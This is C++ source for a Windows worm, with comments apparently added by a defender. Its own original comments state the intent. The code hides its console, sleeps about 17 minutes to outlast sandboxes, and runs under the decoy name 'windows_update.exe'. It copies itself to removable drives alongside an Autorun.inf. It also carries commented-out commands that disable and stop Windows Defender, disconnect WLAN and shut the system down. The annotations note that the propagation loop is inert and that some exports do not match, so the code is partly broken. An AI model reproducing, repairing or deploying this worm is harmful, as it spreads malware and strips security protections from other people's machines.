#include<iostream>
#include<conio.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>
#include<shellapi.h>
#include<processthreadsapi.h>
#include<direct.h>
#include<libloaderapi.h>
#include<winuser.h>
using namespace std;
// File name this program re-launches via ShellExecute (see main) and the name
// procCloner writes into Autorun.inf. It imitates a legitimate Windows
// component; treat the string as an indicator when hunting for this sample.
#define PROCESSNAME "windows_update.exe"
// Name placed in the open= entry of the Autorun.inf written by procCloner.
#define DISGUISE "windows_update.exe"
// Suffix appended to a drive root to form the destination path of the copy
// made by procCloner.
#define DISGUISEPATH "\\windows_update.exe"
// Hides this process's console window: a console is allocated, the window of
// class "ConsoleWindowClass" is looked up, and ShowWindow(..., 0) (SW_HIDE)
// removes it from view. The local HWND shadows the function's own name.
// Detection note: a console process that allocates and immediately hides its
// window leaves nothing visible to the user; this is a behavioural indicator
// worth alerting on in combination with the other activity in this file.
void Stealth()
{
HWND Stealth; // shadows the enclosing function name
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth, 0); // 0 == SW_HIDE
}
// Exported "payload" routine. As written it only lowers the calling thread's
// priority and then runs a 10-iteration loop whose body is entirely commented
// out; the shutdown call after the loop is commented out as well, and the
// parameter proc is never used. The commented lines record the intent:
// disabling and stopping the Windows Defender service (WinDefend), dropping
// the WLAN connection, and forcing a system shutdown.
// Mitigation/detection: reconfiguring WinDefend through sc.exe requires
// administrative rights and is blocked by Defender Tamper Protection on
// current Windows; any sc.exe invocation targeting WinDefend is a high-signal
// detection. Note that main() resolves exports by other names
// ("?SystemProcAinzOoalGown" / "?identifyAinzOoalGown"), which do not match
// this symbol.
void _declspec(dllexport)systemproc(char* proc) //payload thread loader//
{
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_LOWEST); //sets priority of worm thread to avoid detection//
for (int i = 0; i < 10; i++) // loop body is entirely commented out; the loop does nothing
{
/// system("sc config WinDefend start= disabled"); /// stops windows defender//
/// system("sc stop WinDefend"); ///
// system("netsh wlan disconnect"); ///
}
/// system("c:\\windows\\system32\\shutdown /s"); /// shuts down system//
}
// Exported propagation routine: intended to find removable drives and drop a
// copy of this executable (cfile) plus an Autorun.inf on each of them.
// As written the routine is inert: iob starts at 0x43 ('C') and is only ever
// reassigned inside the branch guarded by iob > 0x5A ('Z'), so that guard is
// never true and nothing inside it executes. struct stat / stat() are used
// but no <sys/stat.h> include is visible in this file.
// The intended behaviour is still worth recording for defenders: for a drive
// whose GetDriveType() is 2 (DRIVE_REMOVABLE), cfile is copied to
// <drive>\windows_update.exe when stat() reports it absent, an Autorun.inf
// whose open= line names that copy is written to the drive root, and
// SetFileAttributes(npos, 28) is applied to the copy.
// Mitigation/detection: AutoRun from removable media is disabled by default
// on Windows 7 and later; alert on Autorun.inf creation on removable volumes
// and on a process copying its own image to removable media; restrict
// execution from removable drives with application control (AppLocker/WDAC).
void _declspec(dllexport)procCloner(char* cfile) //usb drive checker and copier//
{
FILE* fp;
char drive[3], npos[30], autof[20];
int iob = 0x43, i; // 0x43 == 'C'; i is the loop counter below
struct stat stbuf;
for (i = 0; i < 256; i++)
{
if (iob > 0x5A) // 0x5A == 'Z'; never true as written, iob is not modified elsewhere
{
iob = 0x43;
drive[1] = ':'; //drive 1 indicates normal partitions//
drive[2] = ' ';
if ((GetDriveType(drive)) == 2) //2 == DRIVE_REMOVABLE//
{
strcpy(npos, drive); // npos = <drive>\windows_update.exe
strcat(npos, DISGUISEPATH);
strcpy(autof, drive); // autof = <drive>\Autorun.inf
if ((stat(npos, &stbuf))== -1) // only when no copy is present yet
{
CopyFile(cfile, npos, 0); //transfers disguised worm copy to usb drive//
strcat(autof, "\\Autorun.inf");
fp = fopen(autof, "w");
fprintf(fp, "[autorun]\nopen=%s", DISGUISE); // open= points AutoRun at the dropped copy
fclose(fp);
SetFileAttributes(npos,28); // 28 == 0x1C; presumably meant to hide the copy - decode against FILE_ATTRIBUTE_* before relying on it
}
else
{
continue;
}
}
}
}
}
// Entry point. Sequence as written:
//  1. Stealth() hides the console, then Sleep(1000000) idles for roughly
//     16.7 minutes before anything else happens (long initial sleeps are a
//     common way to outlast automated-analysis time limits; sandboxes should
//     accelerate sleeps when triaging a sample like this).
//  2. ShellExecute "open" launches PROCESSNAME (windows_update.exe) from the
//     working directory and the main thread's priority is lowered.
//  3. procfile is built from argv[0] (".exe" appended when missing) and passed
//     to a new thread running procCloner.
//  4. The process LoadLibrary()s its own image and resolves an export named
//     "?SystemProcAinzOoalGown" when the working directory contains
//     "Program Files", otherwise "?identifyAinzOoalGown". Neither symbol is
//     defined in this file (the visible exports are systemproc and procCloner),
//     so GetProcAddress presumably returns NULL here - verify on the built
//     binary.
//  5. Both thread handles are waited on for at most 100 ms, the module is
//     freed, and PROCESSNAME is launched twice more.
// Detection/mitigation: a process that hides its console, sleeps for minutes,
// loads its own executable as a library and repeatedly ShellExecutes a file
// named like a Windows component is a strong behavioural signature; block
// execution from user-writable and removable locations with application
// control, and alert on a process loading its own image via LoadLibrary.
int main(int argc, char* argv[])
{
Stealth();
Sleep(1000000); // 1,000,000 ms: about 16.7 minutes of idle time before anything else runs
ShellExecute(NULL, "open", PROCESSNAME, NULL, NULL, 0); // launch windows_update.exe; nShowCmd 0 == SW_HIDE
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_LOWEST); //sets current thread overhead priority//
HANDLE thread, cloner, thands[3];
char* ptr, procfile[300];
ptr = argv[0];
strcpy_s(procfile, ptr); // procfile = this program's own path as seen in argv[0]
if (strstr(ptr, ".exe")== NULL)
{
strcat_s(procfile, ".exe");
}
void(*clonproc)(char*);
clonproc = procCloner;
cloner = CreateThread(0, 0, (DWORD(__stdcall*)(void*))clonproc, procfile, 0, 0); // starts procCloner on a new thread; the cast forces a mismatched start-routine signature
HMODULE hmod;
char dirpath[201];
void(*smack)(char*);
GetCurrentDirectory(200, dirpath);
hmod = LoadLibrary(procfile); // loads this process's own executable as a module
if (strstr(dirpath, "Program Files")!= NULL)
{
smack = (void(*)(char*))GetProcAddress(hmod, "?SystemProcAinzOoalGown"); // export name not defined in this file
thread = CreateThread(0, 0, (DWORD(__stdcall*)(void*))smack, procfile, 0, 0);
}
else
{
smack = (void(*)(char*))GetProcAddress(hmod, "?identifyAinzOoalGown"); // export name not defined in this file
thread = CreateThread(0, 0, (DWORD(__stdcall*)(void*))smack, procfile, 0, 0);
}
thands[0] = cloner;
thands[1] = thread;
thands[2] = ' '; // third slot is never passed to WaitForMultipleObjects (count below is 2)
WaitForMultipleObjects(2, thands, true, 100); // wait for both threads, at most 100 ms
FreeLibrary(hmod);
_wchdir("C:"); // wide-char API given a narrow literal: type mismatch as written
ShellExecute(NULL, "open", PROCESSNAME, NULL, NULL, 0);
ShellExecute(NULL, "open", PROCESSNAME, NULL, NULL, 0);
return EXIT_SUCCESS;
}